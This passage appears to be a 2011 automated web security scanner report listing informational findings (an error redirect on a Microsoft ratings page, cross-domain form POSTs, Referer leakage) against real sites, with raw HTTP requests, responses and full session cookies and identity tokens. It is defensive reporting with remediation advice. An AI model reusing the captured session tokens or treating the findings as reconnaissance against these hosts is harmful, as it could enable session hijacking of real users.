Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093185977:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gia0001B@E0M02hB@E0M

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438138142500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:46:09 GMT
Content-Length: 7648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html id="pageOrientation" dir="ltr">
   <head>
       <link id="linkCss" type="text/css" rel="STYLESHEET" href="Config/ContentRating.css"></link>
   </head>
   <body bgcolor="#f1f1f1" onload="if (parent.adjustIFrameSize) parent.adjustIFrameSize(window);">
       <form name="form2" method="post" action="ratings.aspx?rurl=http%3a%2f%2fwww.microsoft.com%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&amp;l=en-us&amp;frm=False&amp;d=LTR&amp;t=Microsoft+Security+Bulletin+Summary+for+March+2011" id="form2">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />

<script type="text/javascript">
<!--
var theForm = document.forms['form2'];
if (!theForm) {
theForm = document.form2;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
// -->
</script>


<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWDAL+raDpAgKk1J12AqTUlXYC3aK1uQkCnLSniA0Cg7SniA0CgrSniA0CgbSniA0CgLSniA0ClNm7MgKEwuryCgLllo7yCVEhb9nKEa2oI5tXQuYDpQ06mRAu" />
           <table class="TBLMAIN" cellspacing="0" cellpadding="0" border="0" style="width:100%;border-collapse:collapse;">
   <tr>
       <td colspan="2"><table class="TBLOUTER" cellspacing=
...[SNIP]...

Request 2

GET /library/gallery/components/ratingControl/ratings.aspx?rurl=http%3a%2f%2fwww.microsoft.com%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&l=en-us&frm=False&d=LTR&t=Microsoft+Security+Bulletin+Summary+for+March+2011 HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093185977:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gia0001B@E0M02hB@E0M

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /library/gallery/components/ratingControl/CustomError.aspx?m=Object+reference+not+set+to+an+instance+of+an+object.
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279569340700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:48:03 GMT
Content-Length: 263

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flibrary%2fgallery%2fcomponents%2fratingControl%2fCustomError.aspx%3fm%3dObject%2breference%2bnot%2bset%2bto%2ban%2binstance%2bof%2ban%2bobject.">here</a>.</h2>
</body></html>
18.14. http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.microsoft.com
Path:   /technet/security/bulletin/ms11-mar.mspx

Request 1

GET /technet/security/bulletin/ms11-mar.mspx HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093060460:ss=1301092848759; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D
If-Modified-Since: Sat, 26 Mar 2011 01:45:36 GMT

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: -1
Last-Modified: Sat, 26 Mar 2011 01:45:54 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791707641800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:53 GMT
Content-Length: 71652


<html dir="LTR"><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><META name="MS.LOCALE" content="en-us"><title>Microsoft Security Bulletin Summary for March 2011</title><
...[SNIP]...
<img src="http://c.microsoft.com/trans_pixel.asp?source=www&TYPE=' + tt + '&p=technet_security_bulletin&URI=%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&r=http%3a%2f%2fwww.microsoft.com%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&lc=en-us" width=0 height=0 hspace=0 vspace=0 border=0 alt=""/></div></layer>');}}
var rsltextbox = 'msviLSBtbox'; var wtflag = false;
function stripSymbols () { var objrslttextbox = getObjectById(rsltextbox); if (objrslttextbox) { var form = objrslttextbox.form; var s = objrslttextbox.value; filteredValues = "<>!@^*"; var i; var returnString = ""; for (i = 0; i < s.length; i++) { var c = s.charAt(i); if (filteredValues.indexOf(c) == -1) { returnString += c; } else { returnString += " "; } } objrslttextbox.value = returnString; } if(!wtflag) { trackLSB("Site"); } }
function addSubmitEvent() {
msviLSBtbox=document.getElementById("msviLSBtbox")
if(msviLSBtbox)
{
defaultSearchLable = msviLSBtbox.value;
}
var objrslttextbox = getObjectById(rsltextbox);
if (objrslttextbox)
{
var form = objrslttextbox.form;
if (window.attachEvent)
{
form.attachEvent("onsubmit",stripSymbols);
}
else
{
form.addEventListener("submit",stripSymbols,false);
}
}
}
function getObjectById(elid)
{
if (document.getElementById)
{
return document.getElementById(elid);
}
else if (document.all)
{
return document.all[elid];
}
else if (document.layers)
{
return document.layers[elid];
}
}
if (window.attachEvent) { window.attachEvent("onload",addSubmitEvent); } else { window.addEventListener("load",addSubmitEvent,false); }
var FromWeb = false;
function trackLSB(type)
{

clearDefaultSearchLable();

if(type=="Web")
FromWeb = true;
var tmp = document.getElementById("msviLSBtbox");
var errorInfo = document.getElementById("errorInfo");
if(type=="Site" && tmp.value.length==0 && !FromWeb)
{
tmp.value=errorInfo.value;
tmp.style.color='#bc2b2b';
ajustWidth();
}
if (typeof dcsMultiTrack == "funct
...[SNIP]...

Request 2

GET /technet/security/bulletin/ms11-mar.mspx HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093060460:ss=1301092848759; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: -1
Last-Modified: Sat, 26 Mar 2011 01:47:27 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279244741000000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:47:26 GMT
Content-Length: 71486


<html dir="LTR"><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><META name="MS.LOCALE" content="en-us"><title>Microsoft Security Bulletin Summary for March 2011</title><
...[SNIP]...
<img src="http://c.microsoft.com/trans_pixel.asp?source=www&TYPE=' + tt + '&p=technet_security_bulletin&URI=%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&lc=en-us" width=0 height=0 hspace=0 vspace=0 border=0 alt=""/></div></layer>');}}
var rsltextbox = 'msviLSBtbox'; var wtflag = false;
function stripSymbols () { var objrslttextbox = getObjectById(rsltextbox); if (objrslttextbox) { var form = objrslttextbox.form; var s = objrslttextbox.value; filteredValues = "<>!@^*"; var i; var returnString = ""; for (i = 0; i < s.length; i++) { var c = s.charAt(i); if (filteredValues.indexOf(c) == -1) { returnString += c; } else { returnString += " "; } } objrslttextbox.value = returnString; } if(!wtflag) { trackLSB("Site"); } }
function addSubmitEvent() {
msviLSBtbox=document.getElementById("msviLSBtbox")
if(msviLSBtbox)
{
defaultSearchLable = msviLSBtbox.value;
}
var objrslttextbox = getObjectById(rsltextbox);
if (objrslttextbox)
{
var form = objrslttextbox.form;
if (window.attachEvent)
{
form.attachEvent("onsubmit",stripSymbols);
}
else
{
form.addEventListener("submit",stripSymbols,false);
}
}
}
function getObjectById(elid)
{
if (document.getElementById)
{
return document.getElementById(elid);
}
else if (document.all)
{
return document.all[elid];
}
else if (document.layers)
{
return document.layers[elid];
}
}
if (window.attachEvent) { window.attachEvent("onload",addSubmitEvent); } else { window.addEventListener("load",addSubmitEvent,false); }
var FromWeb = false;
function trackLSB(type)
{

clearDefaultSearchLable();

if(type=="Web")
FromWeb = true;
var tmp = document.getElementById("msviLSBtbox");
var errorInfo = document.getElementById("errorInfo");
if(type=="Site" && tmp.value.length==0 && !FromWeb)
{
tmp.value=errorInfo.value;
tmp.style.color='#bc2b2b';
ajustWidth();
}
if (typeof dcsMultiTrack == "function")
{
var qu = document.getElementById("msviLSBtbox").value;

...[SNIP]...
19. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

19.1. http://ezsub.net/isapi/foxisapi.dll/main.sv.run  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The page contains a form which POSTs data to the domain www2.starrcorp.com. The form contains the following fields:

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<!--- THE MAIN FORM -->
<FORM method=post action="http://www2.starrcorp.com/isapi/foxisapi.dll/main.sv.run" NAME="FMAIN"><input type="hidden" name="PUBID" value="586">
...[SNIP]...
19.2. http://my-happyfeet.com/proddetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /proddetail.asp

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /proddetail.asp?prod=0001 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 41348
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<div style="width:160px; background-color: #ffffff;">
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;"><span style="background-color: #AC1F1A; float:right;margin-right:5;margin-top:3">
...[SNIP]...
20. Cross-domain Referer leakage  previous  next
There are 117 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

20.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TO&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
